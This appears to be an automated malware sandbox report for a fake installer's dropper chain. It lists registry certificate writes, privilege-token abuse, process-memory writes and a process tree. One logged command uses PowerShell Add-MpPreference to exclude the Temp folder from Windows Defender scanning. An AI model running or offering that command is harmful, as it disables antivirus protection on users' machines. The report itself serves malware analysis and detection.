4ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner_Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner_Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe -
Runs ping.exe 1 TTPs 8 IoCs
pid Process 7408 PING.EXE 7576 PING.EXE 5572 PING.EXE 6096 PING.EXE 7820 PING.EXE 1180 PING.EXE 4020 PING.EXE 4496 PING.EXE -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 48 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 5440 WerFault.exe 5440 WerFault.exe 5672 Adorarti.exe.com 5672 Adorarti.exe.com 5452 WerFault.exe 5452 WerFault.exe 5532 WerFault.exe 5532 WerFault.exe 1292 Setup.exe 1292 Setup.exe 1292 Setup.exe 1292 Setup.exe 5396 WerFault.exe 5396 WerFault.exe 1264 setup_2.tmp 1264 setup_2.tmp 4720 GcleanerEU.exe 4720 GcleanerEU.exe 6100 stats.tmp 6100 stats.tmp 5216 msedge.exe 5216 msedge.exe 5940 WerFault.exe 5940 WerFault.exe 2272 Process not Found 2272 Process not Found 5052 msedge.exe 5052 msedge.exe 5264 7807031.exe 5264 7807031.exe 5680 WerFault.exe 5680 WerFault.exe 1312 WerFault.exe 1312 WerFault.exe 5492 msiexec.exe 5492 msiexec.exe 4644 694179.exe 4644 694179.exe 3448 WerFault.exe 3448 WerFault.exe 2640 ultramediaburner.tmp 2640 ultramediaburner.tmp 5820 Chrome 5.exe 5820 Chrome 5.exe 6132 Conhost.exe 6132 Conhost.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe 5684 Kelaewetamu.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3208 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 7480 fp7oOqd_Hi5sCI0g6sN5Bg9_.exe 8560 D83B.exe 2016 DQTI2Ix_7lKa3im0Xv6DxIG4.exe -
Suspicious behavior: SetClipboardViewer 5 IoCs
pid Process 3940 WinHoster.exe 1060 5251992.exe 1064 5409542.exe 6976 2624611.exe 5128 2896057.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 956 Thu21a1ef054cac78a.exe Token: SeAssignPrimaryTokenPrivilege 956 Thu21a1ef054cac78a.exe Token: SeLockMemoryPrivilege 956 Thu21a1ef054cac78a.exe Token: SeIncreaseQuotaPrivilege 956 Thu21a1ef054cac78a.exe Token: SeMachineAccountPrivilege 956 Thu21a1ef054cac78a.exe Token: SeTcbPrivilege 956 Thu21a1ef054cac78a.exe Token: SeSecurityPrivilege 956 Thu21a1ef054cac78a.exe Token: SeTakeOwnershipPrivilege 956 Thu21a1ef054cac78a.exe Token: SeLoadDriverPrivilege 956 Thu21a1ef054cac78a.exe Token: SeSystemProfilePrivilege 956 Thu21a1ef054cac78a.exe Token: SeSystemtimePrivilege 956 Thu21a1ef054cac78a.exe Token: SeProfSingleProcessPrivilege 956 Thu21a1ef054cac78a.exe Token: SeIncBasePriorityPrivilege 956 Thu21a1ef054cac78a.exe Token: SeCreatePagefilePrivilege 956 Thu21a1ef054cac78a.exe Token: SeCreatePermanentPrivilege 956 Thu21a1ef054cac78a.exe Token: SeBackupPrivilege 956 Thu21a1ef054cac78a.exe Token: SeRestorePrivilege 956 Thu21a1ef054cac78a.exe Token: SeShutdownPrivilege 956 Thu21a1ef054cac78a.exe Token: SeDebugPrivilege 956 Thu21a1ef054cac78a.exe Token: SeAuditPrivilege 956 Thu21a1ef054cac78a.exe Token: SeSystemEnvironmentPrivilege 956 Thu21a1ef054cac78a.exe Token: SeChangeNotifyPrivilege 956 Thu21a1ef054cac78a.exe Token: SeRemoteShutdownPrivilege 956 Thu21a1ef054cac78a.exe Token: SeUndockPrivilege 956 Thu21a1ef054cac78a.exe Token: SeSyncAgentPrivilege 956 Thu21a1ef054cac78a.exe Token: SeEnableDelegationPrivilege 956 Thu21a1ef054cac78a.exe Token: SeManageVolumePrivilege 956 Thu21a1ef054cac78a.exe Token: SeImpersonatePrivilege 956 Thu21a1ef054cac78a.exe Token: SeCreateGlobalPrivilege 956 Thu21a1ef054cac78a.exe Token: 31 956 Thu21a1ef054cac78a.exe Token: 32 956 Thu21a1ef054cac78a.exe Token: 33 956 Thu21a1ef054cac78a.exe Token: 34 956 Thu21a1ef054cac78a.exe Token: 35 956 Thu21a1ef054cac78a.exe Token: SeDebugPrivilege 836 Thu21568b0ab8.exe Token: SeDebugPrivilege 1036 Thu219d5fe8cf316.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 2344 Thu2156de5489c19.exe Token: SeDebugPrivilege 5264 7807031.exe Token: SeRestorePrivilege 5452 WerFault.exe Token: SeBackupPrivilege 5452 WerFault.exe Token: SeBackupPrivilege 5452 WerFault.exe Token: SeDebugPrivilege 6040 WerFault.exe Token: SeDebugPrivilege 5892 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 5448 DVORAK.exe Token: SeDebugPrivilege 1292 Setup.exe Token: SeDebugPrivilege 4540 BearVpn 3.exe Token: SeDebugPrivilege 4644 694179.exe Token: SeDebugPrivilege 5240 postback.exe Token: SeDebugPrivilege 1456 46807GHF____.exe Token: SeDebugPrivilege 6132 Conhost.exe Token: SeIncreaseQuotaPrivilege 784 powershell.exe Token: SeSecurityPrivilege 784 powershell.exe Token: SeTakeOwnershipPrivilege 784 powershell.exe Token: SeLoadDriverPrivilege 784 powershell.exe Token: SeSystemProfilePrivilege 784 powershell.exe Token: SeSystemtimePrivilege 784 powershell.exe Token: SeProfSingleProcessPrivilege 784 powershell.exe Token: SeIncBasePriorityPrivilege 784 powershell.exe Token: SeCreatePagefilePrivilege 784 powershell.exe Token: SeBackupPrivilege 784 powershell.exe Token: SeRestorePrivilege 784 powershell.exe Token: SeShutdownPrivilege 784 powershell.exe Token: SeDebugPrivilege 784 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2520 Thu21b93295136197.tmp 3104 UltraMediaBurner.exe 6100 stats.tmp 3104 UltraMediaBurner.exe 3104 UltraMediaBurner.exe 1264 setup_2.tmp 5928 WerFault.exe 5928 WerFault.exe 5928 WerFault.exe 5052 msedge.exe 2640 ultramediaburner.tmp 1596 installer.exe 8036 MSIEXEC.EXE 6384 MSIEXEC.EXE 7116 MSI7DAE.tmp 7116 MSI7DAE.tmp 7116 MSI7DAE.tmp 2440 rUNdlL32.eXe 2440 rUNdlL32.eXe 2440 rUNdlL32.eXe 7940 Rimasta.exe.com 7940 Rimasta.exe.com 7940 Rimasta.exe.com 1036 Rimasta.exe.com 1036 Rimasta.exe.com 1036 Rimasta.exe.com 6328 Rimasta.exe.com 6328 Rimasta.exe.com 6328 Rimasta.exe.com 4684 Rimasta.exe.com 4684 Rimasta.exe.com 4684 Rimasta.exe.com 5696 schtasks.exe 5748 Rimasta.exe.com 5748 Rimasta.exe.com 5748 Rimasta.exe.com 7908 svrwebui.exe 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp 8008 vpn.tmp -
Suspicious use of SendNotifyMessage 33 IoCs
pid Process 3104 UltraMediaBurner.exe 3104 UltraMediaBurner.exe 3104 UltraMediaBurner.exe 5928 WerFault.exe 5928 WerFault.exe 5928 WerFault.exe 7116 MSI7DAE.tmp 7116 MSI7DAE.tmp 7116 MSI7DAE.tmp 2440 rUNdlL32.eXe 2440 rUNdlL32.eXe 2440 rUNdlL32.eXe 7940 Rimasta.exe.com 7940 Rimasta.exe.com 7940 Rimasta.exe.com 1036 Rimasta.exe.com 1036 Rimasta.exe.com 1036 Rimasta.exe.com 6328 Rimasta.exe.com 6328 Rimasta.exe.com 6328 Rimasta.exe.com 4684 Rimasta.exe.com 4684 Rimasta.exe.com 4684 Rimasta.exe.com 5748 Rimasta.exe.com 5748 Rimasta.exe.com 5748 Rimasta.exe.com 4816 Rimasta.exe.com 4816 Rimasta.exe.com 4816 Rimasta.exe.com 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1616 cmd.exe 5228 MaskVPNUpdate.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 3208 Process not Found 3208 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5084 wrote to memory of 5012 5084 setup_x86_x64_install.exe 77 PID 5084 wrote to memory of 5012 5084 setup_x86_x64_install.exe 77 PID 5084 wrote to memory of 5012 5084 setup_x86_x64_install.exe 77 PID 5012 wrote to memory of 4900 5012 setup_installer.exe 80 PID 5012 wrote to memory of 4900 5012 setup_installer.exe 80 PID 5012 wrote to memory of 4900 5012 setup_installer.exe 80 PID 4900 wrote to memory of 3040 4900 setup_install.exe 84 PID 4900 wrote to memory of 3040 4900 setup_install.exe 84 PID 4900 wrote to memory of 3040 4900 setup_install.exe 84 PID 4900 wrote to memory of 3064 4900 setup_install.exe 85 PID 4900 wrote to memory of 3064 4900 setup_install.exe 85 PID 4900 wrote to memory of 3064 4900 setup_install.exe 85 PID 4900 wrote to memory of 2228 4900 setup_install.exe 86 PID 4900 wrote to memory of 2228 4900 setup_install.exe 86 PID 4900 wrote to memory of 2228 4900 setup_install.exe 86 PID 4900 wrote to memory of 1608 4900 setup_install.exe 88 PID 4900 wrote to memory of 1608 4900 setup_install.exe 88 PID 4900 wrote to memory of 1608 4900 setup_install.exe 88 PID 4900 wrote to memory of 4400 4900 setup_install.exe 87 PID 4900 wrote to memory of 4400 4900 setup_install.exe 87 PID 4900 wrote to memory of 4400 4900 setup_install.exe 87 PID 4900 wrote to memory of 3540 4900 setup_install.exe 89 PID 4900 wrote to memory of 3540 4900 setup_install.exe 89 PID 4900 wrote to memory of 3540 4900 setup_install.exe 89 PID 4900 wrote to memory of 4552 4900 setup_install.exe 90 PID 4900 wrote to memory of 4552 4900 setup_install.exe 90 PID 4900 wrote to memory of 4552 4900 setup_install.exe 90 PID 4900 wrote to memory of 824 4900 setup_install.exe 91 PID 4900 wrote to memory of 824 4900 setup_install.exe 91 PID 4900 wrote to memory of 824 4900 setup_install.exe 91 PID 4900 wrote to memory of 3868 4900 setup_install.exe 92 PID 4900 wrote to memory of 3868 4900 setup_install.exe 92 PID 4900 wrote to memory of 3868 4900 setup_install.exe 92 PID 4900 wrote to memory of 5084 4900 setup_install.exe 106 PID 4900 wrote to memory of 5084 4900 setup_install.exe 106 PID 4900 wrote to memory of 5084 4900 setup_install.exe 106 PID 2228 wrote to memory of 912 2228 cmd.exe 105 PID 2228 wrote to memory of 912 2228 cmd.exe 105 PID 2228 wrote to memory of 912 2228 cmd.exe 105 PID 1608 wrote to memory of 956 1608 cmd.exe 104 PID 1608 wrote to memory of 956 1608 cmd.exe 104 PID 1608 wrote to memory of 956 1608 cmd.exe 104 PID 4900 wrote to memory of 476 4900 setup_install.exe 93 PID 4900 wrote to memory of 476 4900 setup_install.exe 93 PID 4900 wrote to memory of 476 4900 setup_install.exe 93 PID 3040 wrote to memory of 784 3040 cmd.exe 103 PID 3040 wrote to memory of 784 3040 cmd.exe 103 PID 3040 wrote to memory of 784 3040 cmd.exe 103 PID 3064 wrote to memory of 1036 3064 cmd.exe 102 PID 3064 wrote to memory of 1036 3064 cmd.exe 102 PID 4900 wrote to memory of 1176 4900 setup_install.exe 101 PID 4900 wrote to memory of 1176 4900 setup_install.exe 101 PID 4900 wrote to memory of 1176 4900 setup_install.exe 101 PID 4400 wrote to memory of 1208 4400 cmd.exe 100 PID 4400 wrote to memory of 1208 4400 cmd.exe 100 PID 4400 wrote to memory of 1208 4400 cmd.exe 100 PID 4900 wrote to memory of 1424 4900 setup_install.exe 99 PID 4900 wrote to memory of 1424 4900 setup_install.exe 99 PID 4900 wrote to memory of 1424 4900 setup_install.exe 99 PID 3540 wrote to memory of 1676 3540 cmd.exe 98 PID 3540 wrote to memory of 1676 3540 cmd.exe 98 PID 3540 wrote to memory of 1676 3540 cmd.exe 98 PID 824 wrote to memory of 3812 824 cmd.exe 94 PID 824 wrote to memory of 3812 824 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu219d5fe8cf316.exeThu219d5fe8cf316.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
